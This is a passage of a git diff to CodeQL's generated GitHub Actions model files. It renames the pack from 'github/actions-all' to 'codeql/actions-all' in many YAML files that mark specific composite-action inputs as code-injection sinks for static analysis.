pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index 536e6d914a2..6930bfed43f 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index 45bfb025ac9..94a802aa36f 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index bba69dfc7a0..04246517883 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 0fbc67e2b1b..2dd758bbccb 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index 6c6a4264d51..5764bab2ebb 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index ee18012a8f5..bbf2f0dc3de 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 3dc39052707..de80b5607d8 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index b98826b9f02..ce748cd8fc9 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index d000c5eb4d5..ae43fb8964d 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 409ef9564d3..06f888fdecf 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index 60a79604580..170505a1901 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] @@ -21,7 +21,7 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index 4effdea078e..3bc3b24cba8 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index d2c44be6261..9ac0e61a028 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 098782a6bef..2b22333ba02 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index e08f4ba9bc2..5277000b273 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 97326453158..e596c90c79d 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 8f6c13884c5..226fab0382b 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index f7f2f139e85..892cd78749b 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 11b423e871c..f7bd2567ec8 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 954b2d05858..126bf5c28d7 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 6cdb74f1278..9ce67a2592d 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index e6820c900e3..11e82c1bf24 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index ba3ad6e8b0c..06418a823eb 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 114b8ce168e..f2d07bc848d 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 834353d89a8..e1e80cb9eb6 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 1c903d71cbe..8a8760c9bf6 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index c34200337f2..9374557b62a 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index 19d14bbe988..5a27009da98 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 0308c934d7e..6ca81714510 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 6039a6c3628..0bd93295605 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 4962f4f6281..896c7ab520a 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index 91c9e22df2a..50bfce009b0 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 760858b7eec..8cbaa9ccc74 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 8d219108234..e25e7fd7560 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index e889a394563..d1228eb3df9 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 8f96daba8df..b987ca6683b 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 1e73f98b3d3..20060fa7445 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index c92eb434d47..297b47a3ff5 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 9de3892ac0c..16a0386beab 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index 2ae0b823187..37556bcb99d 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 8e2744b2de7..9532f50714e 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index bf2e23efba8..465b4145aeb 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index d8d86591302..b607b57693c 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index 1ac30a3790e..76243ecd600 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 1c05276abe0..68c5a0b4b69 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index c4b67ad5c58..2cf57246d0c 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index a4400dde9d4..9f62363e169 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 8b5566b4996..0dfbad39abe 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 349f66f4387..eb76e7d7a45 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index f717bf5c5d8..7672a6aadbb 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index b2a851a0dba..041705b1f55 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 054af41f284..b80d135bfb3 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 31eeed0d251..2e6fc133dd9 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 97adf115bd2..710cd795161 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ 